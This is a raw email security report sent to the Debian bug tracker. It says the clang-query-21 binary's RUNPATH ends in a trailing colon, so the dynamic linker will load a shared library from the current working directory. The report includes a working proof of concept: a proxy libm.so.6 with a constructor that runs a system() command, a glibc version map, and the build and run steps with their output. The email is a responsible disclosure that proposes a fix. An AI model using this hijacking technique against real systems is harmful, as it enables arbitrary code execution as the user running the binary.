[From nobody Tue Jul 21 19:21:08 2026
Received: (at submit) by bugs.debian.org; 28 May 2026 01:55:28 +0000
X-Spam-Checker-Version: SpamAssassin 4.0.1-bugs.debian.org_2005_01_02
 (2024-03-25) on buxtehude.debian.org
X-Spam-Level: 
X-Spam-Status: No, score=-13.7 required=4.0 tests=BAYES_00,
 BODY_INCLUDES_PACKAGE,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,
 DKIM_VALID_EF,FREEMAIL_FROM,HAS_PACKAGE,HTML_MESSAGE,MULTALT,
 RCVD_IN_DNSWL_NONE,SPF_HELO_NONE,SPF_PASS autolearn=ham
 autolearn_force=no version=4.0.1-bugs.debian.org_2005_01_02
X-Spam-Bayes: score:0.0000 Tokens: new, 87; hammy, 150; neutral, 108; spammy,
 0. spammytokens: hammytokens:0.000-+--buildsystem, 0.000-+--fPIC,
 0.000-+--unistd.h, 0.000-+--UD:unistd.h, 0.000-+--unistdh
Return-path: &lt;jonathan.trowbridge@gmail.com&gt;
Received: from mail-dy1-x132f.google.com ([2607:f8b0:4864:20::132f]:38006)
 by buxtehude.debian.org with esmtps
 (TLS1.3:ECDHE_X25519__RSA_PSS_RSAE_SHA256__AES_128_GCM:128)
 (Exim 4.96) (envelope-from &lt;jonathan.trowbridge@gmail.com&gt;)
 id 1wSPy4-00Bc4N-0V for submit@bugs.debian.org;
 Thu, 28 May 2026 01:55:28 +0000
Received: by mail-dy1-x132f.google.com with SMTP id
 5a478bee46e88-304559733faso500440eec.0
 for &lt;submit@bugs.debian.org&gt;; Wed, 27 May 2026 18:55:28 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1779933326; cv=none;
 d=google.com; s=arc-20240605;
 b=fbqUmGn/mUJpR7R0BAmx6Xu/7EP8Kh74kBmSP8zhBHVwiwq4+o4B1EJJLtNTB9qutn
 Sd3kqQtHNf8Qz7tULINK7JPANPsW+RaR8bWjggADONWPpV1SfT6ECQsZ2fwBEIxeOcdT
 z5xOtFRgq9uaGcMl9BIIBLtw3WW6CLn8RGhshVgyudfkv2GDNdwRPupObw9dHIlwseoD
 hwj8sNz7+Mjoj+UmY/3wZnyymqGzmPBbTSRBbUS0iq/Sy1IioZhwfyuspkLLRhzYdjrx
 P/8ejdRoKyWtmXNBX8RZEZ9nHVBPnICRIoFdVQ4V0OzemKttpZA9+cATSLpE80paCxDc
 t8XQ==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com;
 s=arc-20240605; 
 h=to:subject:message-id:date:from:mime-version:dkim-signature;
 bh=uto5oXFUYgFbEHaiT4s/8j2rjm13Uw2mceoEXWUXHWQ=;
 fh=lIR/7veID2U00tj1D35G+ANF85YwqTAbTuNH/WGncTs=;
 b=N3ee8sz+qqIvZqWsZN+54+qPuI8FyKYSKN20Zejm0g8h7DkLG42/cLDud0V8K97nlt
 ekyQubJhSQ5PkuTMZfEXfLFr92/U/6geP/16E74KGwZMsvIJxhbZCJGzSEHQ4ujfFITP
 QS024i/Tv7Q9ofOJtJjgpE8paMtf8TLva9WkUcq/wdh1vh3z7NF/xzqIK0EAGCCy+ZpV
 m5765UQ8u4lwVD0VyjW/njxRlUo4SubBGmncqpWe8wmw0vEIW3H0jcVwFihDjO0yHHLE
 r+YCr/NmDng+YxKZUN9yQ4aPE262y9wxviFhKaaFO2B5KeJ/RSkf2JRmCPuMbECyYMRQ
 xC6g==; darn=bugs.debian.org
ARC-Authentication-Results: i=1; mx.google.com; arc=none
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
 d=gmail.com; s=20251104; t=1779933326; x=1780538126; darn=bugs.debian.org;
 h=to:subject:message-id:date:from:mime-version:from:to:cc:subject
 :date:message-id:reply-to;
 bh=uto5oXFUYgFbEHaiT4s/8j2rjm13Uw2mceoEXWUXHWQ=;
 b=XNUkOZUS/D0n2qGE0r/t8ez7QswwOv3eNoyIyYjneovz9Ol3pGpnya+xq1Eg/72m3f
 5qv2syl8vPtW4lNJyeg8QADaxcwiHqYDXOSrTW6egzwQ8rD2B0ZsomMmL1+m0ZkqMiac
 od2u7QGmvOWseHI3Pu+0msIGBujwUx3ZwxgXj4Fs7uR6G2WBVbZh9yIOYApYdLTP6/6P
 HbMWfo/V1NWH7aQGftbU/rR0jPCeUmIxV1fJtt36glxGCuwIXYMxqrFAmneauYGUoDwm
 3+tgqCvRn657HqWIFN1/16zjL9PCUI9MY4/eKXuwjL0qsLxav9PTPV9bkavNNgKoFyvc
 16Aw==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
 d=1e100.net; s=20251104; t=1779933326; x=1780538126;
 h=to:subject:message-id:date:from:mime-version:x-gm-gg
 :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to;
 bh=uto5oXFUYgFbEHaiT4s/8j2rjm13Uw2mceoEXWUXHWQ=;
 b=nx7wuYtE4+6LmO00+L8zJdHSDxzrEucefOUwFznc6Sb22pyOUaRYcnPDBpgOCkKT+6
 AVeV4MQhb7lqlfYTiYBMvI2wwGbWnqo71yRL9Ljre8XrlcsGlUn7o6ppPmNwvnnmY9K4
 tmbpxM/w9KWIyKIaox5F7PybZNY1JLZ3SS7RrcIs17bary583YYjWE1+qIgOkBJQXqJs
 cN794MS6SMEDO/iR6B9z9OsEeJ2VBngrnuuX01BS1YAbKfl4ulBFK0U55bemNiADpbeK
 1mZ9Tv8klrpMQGjTYhWKALQyKrP9bstuhqgodjKduWuk6Ci/g6BL8L11Sxu921umDOIV
 X+Pw==
X-Gm-Message-State: AOJu0YxVFZWJFgbWrMXLGxTNlBy9/4ovdAWG5amp/8+Nk+fkB/5d6gBN
 vfP4TnskZAFrsO+x+Z3D5/WHnWfMt3E6YH9isj4PWIQQj4BR7IwbAZ/khsxYAEtKQm0Fr4NG/kn
 u4f2I/nMwWvf9zXAUKz3VF+45LChW+m7I8+B6
X-Gm-Gg: Acq92OGjpgxpuCqUNQBQgpVuo64S6YryguP+R9CnMwGK7x0UmN+UNUjQeutdyehpqif
 RPCDP9ln4tFhGJipdHWS1pwZ2aNOmJKK8zopQpnbgAu1x7AEsme3TFzEJo/PnSiOx/XUPTnBjmo
 u/N9c4WlHKdqqreZ7RF9lXN7B3NzouhDBCi0SWMgKPjVW5w+BRdGDpHVlT0gpltDuD+zAcNaMXC
 0/DBZcaxsGsKIhRDuTL1P/sWMVSIWVtUKK0QMgGMaQcQ11fn9oHAFx7b3FSioDtOrM/5Zbsoc29
 xaa3ajNjzViHzP9m
X-Received: by 2002:a05:7022:51f:b0:134:cf44:5fa9 with SMTP id
 a92af1059eb24-1365f1b90a6mr3851037c88.0.1779933326342; Wed, 27 May 2026
 18:55:26 -0700 (PDT)
MIME-Version: 1.0
From: Jonathan Trowbridge &lt;jonathan.trowbridge@gmail.com&gt;
Date: Wed, 27 May 2026 21:55:15 -0400
X-Gm-Features: AVHnY4Klgl3fiF5uQ3V3kU81Maajmw2vG7Gsx5T5GbbUa1RiPUBoO-vy1tnf-88
Message-ID: &lt;CAKRsXK5rOLGoVz8qyiYOX0me7tv04zA49whYq9_rNqN=1J7JMA@mail.gmail.com&gt;
Subject: clang-tools-21: Shared library hijacking via Implicit CWD in RUNPATH
To: submit@bugs.debian.org
Content-Type: multipart/alternative; boundary=&quot;000000000000a3ffe70652d70549&quot;
Delivered-To: submit@bugs.debian.org

--000000000000a3ffe70652d70549
Content-Type: text/plain; charset=&quot;UTF-8&quot;

Package: clang-tools-21
Version: 1:21.1.8-7+b1
Severity: grave
Tags: security

 I have identified a security vulnerability (CWE-427) in the
`clang-query-21` binary where the `RUNPATH` contains a trailing colon (`:`).

According to ELF standards, a trailing or empty entry in `RUNPATH` is
interpreted by the dynamic linker as the current working directory (`.`).
This allows a local attacker to achieve arbitrary code  execution as the
user running `clang-query-21` by placing a malicious shared library in the
working directory.

*Verification:*

 $ readelf -d /usr/bin/clang-query-21 | grep RUNPATH

 0x000000000000001d (RUNPATH)            Library runpath:
[$ORIGIN/../lib:/build/reproducible-path/llvm-toolchain-21-21.1.8/build-llvm/tools/clang/stage2-bins/lib:]

Note the trailing colon. Other binaries in the same package, such as
clang-check-21, have correctly formed RUNPATHs ($ORIGIN/../lib).

*Proof-of-Concept:*

I have successfully exploited this on a Kali Linux (arm64) system by
creating a &quot;proxy&quot; `libm.so.6` in the current directory. By satisfying the
`GLIBC_2.17`, `GLIBC_2.29`, and `GLIBC_2.38` version requirements for
symbols like `fmod`, `log`, and `pow`, I was able to execute a
constructor-based payload (system call to touch /tmp/pwned) before the main
process starts.

This appears to be a build-system misconfiguration specifically affecting
the `clang-query` component of the `llvm-toolchain-21` source package.

*poc_libm.c*

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;

// Dummy implementations
double fmod(double x, double y) { return 0.0; }
double log10(double x) { return 0.0; }
double log(double x) { return 0.0; }
double pow(double x, double y) { return 0.0; }
double ceil(double x) { return 0.0; }
double floor(double x) { return 0.0; }
double exp(double x) { return 0.0; }
double log2(double x) { return 0.0; }
double sin(double x) { return 0.0; }
double cos(double x) { return 0.0; }
double tan(double x) { return 0.0; }
double cosh(double x) { return 0.0; }
double sinh(double x) { return 0.0; }
double tanh(double x) { return 0.0; }
double erf(double x) { return 0.0; }
double logb(double x) { return 0.0; }
double log1p(double x) { return 0.0; }
double atan(double x) { return 0.0; }
double acos(double x) { return 0.0; }
double asin(double x) { return 0.0; }
double atan2(double y, double x) { return 0.0; }
double sqrt(double x) { return 0.0; }
double remainder(double x, double y) { return 0.0; }
int fesetround(int round) { return 0; }

void __attribute__((constructor)) init() {
    system(&quot;touch /tmp/pwned&quot;);
    printf(&quot;\n[!] HIJACK SUCCESSFUL: libm.so.6 proxied for
clang-query-21\n&quot;);
    exit(0);
}

*versions.map*

GLIBC_2.17 {
    global:
        log10; ceil; floor; sin; cos; tan; cosh; sinh; tanh; erf; logb;
log1p; atan; acos; asin; atan2; sqrt; remainder; fesetround;
};
GLIBC_2.29 {
    global:
        pow; exp; log2; log;
};
GLIBC_2.38 {
    global:
        fmod;
};
GLIBC_2.27 { global: *; };

*Example:*

$ gcc -shared -fPIC poc_libm.c -o libm.so.6
-Wl,--version-script=versions.map
$ /usr/bin/clang-query-21

[!] HIJACK SUCCESSFUL: libm.so.6 proxied for clang-query-21

$ ls /tmp | grep pwned
pwned

 I am reporting this to the BTS as per the Debian Security FAQ guidance for
vulnerabilities in the 'unstable' distribution.

*Proposed Fix:*

The RUNPATH should be sanitized during the build process to remove trailing
colons.

--000000000000a3ffe70652d70549
Content-Type: text/html; charset=&quot;UTF-8&quot;
Content-Transfer-Encoding: quoted-printable

&lt;div dir=3D&quot;ltr&quot;&gt;Package: clang-tools-21&lt;br&gt;Version: 1:21.1.8-7+b1&lt;br&gt;Sever=
ity: grave&lt;br&gt;&lt;div&gt;Tags: security&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;=C2=A0I have ide=
ntified a security vulnerability (CWE-427) in the `clang-query-21` binary w=
here the `RUNPATH` contains a trailing colon (`:`).&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;di=
v&gt;According to ELF standards, a trailing or empty entry in `RUNPATH` is int=
erpreted by the dynamic linker as the current working directory (`.`). This=
 allows a local attacker to achieve arbitrary code =C2=A0execution as the u=
ser running `clang-query-21` by placing a malicious shared library in the w=
orking directory.&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Verification:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;=
br&gt;&lt;/div&gt;&lt;div&gt;=C2=A0$ readelf -d /usr/bin/clang-query-21 | grep RUNPATH&lt;/di=
v&gt;&lt;div&gt;&lt;br&gt;=C2=A00x000000000000001d (RUNPATH) =C2=A0 =C2=A0 =C2=A0 =C2=A0 =
=C2=A0 =C2=A0Library runpath: [$ORIGIN/../lib:/build/reproducible-path/llvm=
-toolchain-21-21.1.8/build-llvm/tools/clang/stage2-bins/lib:]&lt;/div&gt;&lt;div&gt;&lt;br=
&gt;&lt;/div&gt;&lt;div&gt;Note the trailing colon. Other binaries in the same package, su=
ch as clang-check-21, have correctly formed RUNPATHs ($ORIGIN/../lib).&lt;/div=
&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Proof-of-Concept:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br&gt;&lt;/b&gt;&lt;/div&gt;&lt;d=
iv&gt;I have successfully exploited this on a Kali Linux (arm64) system by cre=
ating a &quot;proxy&quot; `libm.so.6` in the current directory. By satisfyi=
ng the `GLIBC_2.17`, `GLIBC_2.29`, and `GLIBC_2.38` version requirements fo=
r symbols like `fmod`, `log`, and `pow`, I was able to execute a constructo=
r-based payload (system call to touch /tmp/pwned) before the main process s=
tarts.&lt;br&gt;&lt;br&gt;This appears to be a build-system misconfiguration specifical=
ly affecting the `clang-query` component of the `llvm-toolchain-21` source =
package.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;poc_libm.c&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;#include &amp;lt=
;stdio.h&gt;&lt;br&gt;#include &lt;stdlib.h&gt;&lt;br&gt;#include &lt;unistd.h&gt;&lt;br&gt;&lt;=
br&gt;// Dummy implementations&lt;br&gt;double fmod(double x, double y) { return 0.0=
; }&lt;br&gt;double log10(double x) { return 0.0; }&lt;br&gt;double log(double x) { ret=
urn 0.0; }&lt;br&gt;double pow(double x, double y) { return 0.0; }&lt;br&gt;double ceil=
(double x) { return 0.0; }&lt;br&gt;double floor(double x) { return 0.0; }&lt;br&gt;dou=
ble exp(double x) { return 0.0; }&lt;br&gt;double log2(double x) { return 0.0; }&lt;=
br&gt;double sin(double x) { return 0.0; }&lt;br&gt;double cos(double x) { return 0.=
0; }&lt;br&gt;double tan(double x) { return 0.0; }&lt;br&gt;double cosh(double x) { ret=
urn 0.0; }&lt;br&gt;double sinh(double x) { return 0.0; }&lt;br&gt;double tanh(double x=
) { return 0.0; }&lt;br&gt;double erf(double x) { return 0.0; }&lt;br&gt;double logb(do=
uble x) { return 0.0; }&lt;br&gt;double log1p(double x) { return 0.0; }&lt;br&gt;double=
 atan(double x) { return 0.0; }&lt;br&gt;double acos(double x) { return 0.0; }&lt;br=
&gt;double asin(double x) { return 0.0; }&lt;br&gt;double atan2(double y, double x) =
{ return 0.0; }&lt;br&gt;double sqrt(double x) { return 0.0; }&lt;br&gt;double remainde=
r(double x, double y) { return 0.0; }&lt;br&gt;int fesetround(int round) { return=
 0; }&lt;br&gt;&lt;br&gt;void __attribute__((constructor)) init() {&lt;br&gt;=C2=A0 =C2=A0 sy=
stem(&quot;touch /tmp/pwned&quot;);&lt;br&gt;=C2=A0 =C2=A0 printf(&quot;\n[!] HIJ=
ACK SUCCESSFUL: libm.so.6 proxied for clang-query-21\n&quot;);&lt;br&gt;=C2=A0 =
=C2=A0 exit(0);&lt;br&gt;}&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;versions.map&lt;/b&gt;&lt;/div&gt;&lt;div=
&gt;&lt;br&gt;GLIBC_2.17 {&lt;br&gt;=C2=A0 =C2=A0 global:&lt;br&gt;=C2=A0 =C2=A0 =C2=A0 =C2=A0 l=
og10; ceil; floor; sin; cos; tan; cosh; sinh; tanh; erf; logb; log1p; atan;=
 acos; asin; atan2; sqrt; remainder; fesetround;&lt;br&gt;};&lt;br&gt;GLIBC_2.29 {&lt;br&gt;=
=C2=A0 =C2=A0 global:&lt;br&gt;=C2=A0 =C2=A0 =C2=A0 =C2=A0 pow; exp; log2; log;&lt;b=
r&gt;};&lt;br&gt;GLIBC_2.38 {&lt;br&gt;=C2=A0 =C2=A0 global:&lt;br&gt;=C2=A0 =C2=A0 =C2=A0 =C2=
=A0 fmod;&lt;br&gt;};&lt;br&gt;GLIBC_2.27 { global: *; };&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Example:=
&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;$ gcc -shared -fPIC poc_libm.c -o libm=
.so.6 -Wl,--version-script=3Dversions.map&lt;br&gt;$ /usr/bin/clang-query-21&lt;br&gt;&lt;=
br&gt;[!] HIJACK SUCCESSFUL: libm.so.6 proxied for clang-query-21&lt;br&gt;&lt;br&gt;$ ls =
/tmp | grep pwned&lt;br&gt;pwned&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;=C2=A0I am reporting this to t=
he BTS as per the Debian Security FAQ guidance for vulnerabilities in the &amp;=
#39;unstable&#39; distribution.&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Proposed Fix:&lt;/=
b&gt;&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;The RUNPATH should be sanitized during the build proce=
ss to remove trailing colons. &lt;/div&gt;&lt;/div&gt;

--000000000000a3ffe70652d70549--
]